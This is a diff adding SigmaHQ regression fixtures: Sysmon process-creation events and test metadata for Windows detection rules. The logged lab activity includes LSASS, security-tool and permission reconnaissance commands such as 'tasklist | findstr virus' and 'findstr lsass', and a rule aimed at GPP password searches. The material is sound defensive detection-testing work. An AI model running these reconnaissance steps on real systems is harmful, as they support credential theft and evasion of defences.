+author: SigmaHQ Team
+rule_metadata:
+ - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d
+ title: Findstr GPP Passwords
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx
new file mode 100644
index 000000000..d02e83bf9
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json
new file mode 100644
index 000000000..b194da7e5
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:41:46.744119Z" + } + }, + "EventRecordID": 12151329, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:41:46.742", + "ProcessGuid": "5AA13A44-0BDA-68FD-7836-000000004002", + "ProcessId": 8892, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr lsass", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml
new file mode 100644
index 000000000..9181cab89
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml
@@ -0,0 +1,13 @@
+id: 241a8371-1554-4cfc-8a51-c671669f4a71
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: fe63010f-8823-4864-a96b-a7b4a0f7b929
+ title: LSASS Process Reconnaissance Via Findstr.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx
new file mode 100644
index 000000000..510394a4d
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json
new file mode 100644
index 000000000..05d65fd77
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json
@@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.671694Z" + } + }, + "EventRecordID": 12249325, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.664", + "ProcessGuid": "5AA13A44-0D15-68FD-B436-000000004002", + "ProcessId": 2764, + "Image": "C:\\Windows\\System32\\icacls.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "-", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "iCACLS.EXE", + "CommandLine": "icacls \"C:\\Program Files\\*\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.679477Z" + } + }, + "EventRecordID": 12249342, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.673", + "ProcessGuid": "5AA13A44-0D15-68FD-B536-000000004002", + "ProcessId": 9016, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr \"(M)\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + 
"#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.687849Z" + } + }, + "EventRecordID": 12249358, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.681", + "ProcessGuid": "5AA13A44-0D15-68FD-B636-000000004002", + "ProcessId": 3356, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr \"Everyone\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml
new file mode 100644
index 000000000..1f98e6f88
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml
@@ -0,0 +1,13 @@
+id: bfab9c3b-5f4b-496c-aa6a-8870fec99738
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 47e4bab7-c626-47dc-967b-255608c9a920
+ title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx
new file mode 100644
index 000000000..d47f2d833
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json
new file mode 100644
index 000000000..610578ece
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json
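Review bot: `match_count: 1` should be checked against the fixture before this lands: the accompanying JSON dump holds three Sysmon EventID 1 records, and two of them are findstr.exe invocations (`findstr "(M)"` and `findstr "Everyone"`), so the expected count depends on whether rule 47e4bab7-c626-47dc-967b-255608c9a920 matches on the `(M)` ACL-output pattern as well as on `Everyone`. If both invocations are intended hits the line should read `match_count: 2`; if only the `Everyone` one is, the `(M)` and icacls events still serve as negative samples, but that intent belongs in the `description` so a later rule change that starts matching `(M)` is recognised as a regression rather than a fixture error.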
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:51:29.178909Z" + } + }, + "EventRecordID": 9129415, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:51:29.168", + "ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002", + "ProcessId": 3384, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr powershell\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml
new file mode 100644
index 000000000..2a5e7846c
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml
@@ -0,0 +1,13 @@
+id: 5bb16f46-e370-4a40-a47a-d047e4482fc1
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: ccb5742c-c248-4982-8c5c-5571b9275ad3
+ title: Recon Command Output Piped To Findstr.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx
new file mode 100644
index 000000000..4793bbbe0
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json
new file mode 100644
index 000000000..ce96c60fa
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json
@@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.663980Z" + } + }, + "EventRecordID": 9145421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.657", + "ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ProcessId": 5144, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr virus\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + 
"#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.675229Z" + } + }, + "EventRecordID": 9145437, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.674", + "ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002", + "ProcessId": 6320, + "Image": "C:\\Windows\\System32\\tasklist.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Lists the current running tasks", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "tasklist.exe", + "CommandLine": "tasklist", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.677359Z" + } + }, + "EventRecordID": 9145443, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.676", + "ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002", + "ProcessId": 9052, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr virus", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml
new file mode 100644
index 000000000..f71546cde
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml
@@ -0,0 +1,13 @@
+id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42
+ title: Security Tools Keyword Lookup Via Findstr.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx
new file mode 100644
index 000000000..3c9cdf238
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json
new file mode 100644
index 000000000..744d48f49
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:36.346438Z" + } + }, + "EventRecordID": 12260122, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:36.344", + "ProcessGuid": "5AA13A44-0D38-68FD-B736-000000004002", + "ProcessId": 7732, + "Image": "C:\\Windows\\System32\\finger.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "TCPIP Finger Command", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "finger.exe", + "CommandLine": "finger", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505", + "ParentProcessGuid": "5AA13A44-0BDF-68FD-7936-000000004002", + "ParentProcessId": 5232, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd / c \"tasklist | findstr lsass\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml
new file mode 100644
index 000000000..92bb2d679
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml
@@ -0,0 +1,13 @@
+id: 312cf7da-b126-4d53-afc7-01c96aa9710e
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: af491bca-e752-4b44-9c86-df5680533dbc
+ title: Finger.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx
new file mode 100644
index 000000000..08018ab79
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json
new file mode 100644
index 000000000..c3f8fdc56
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json
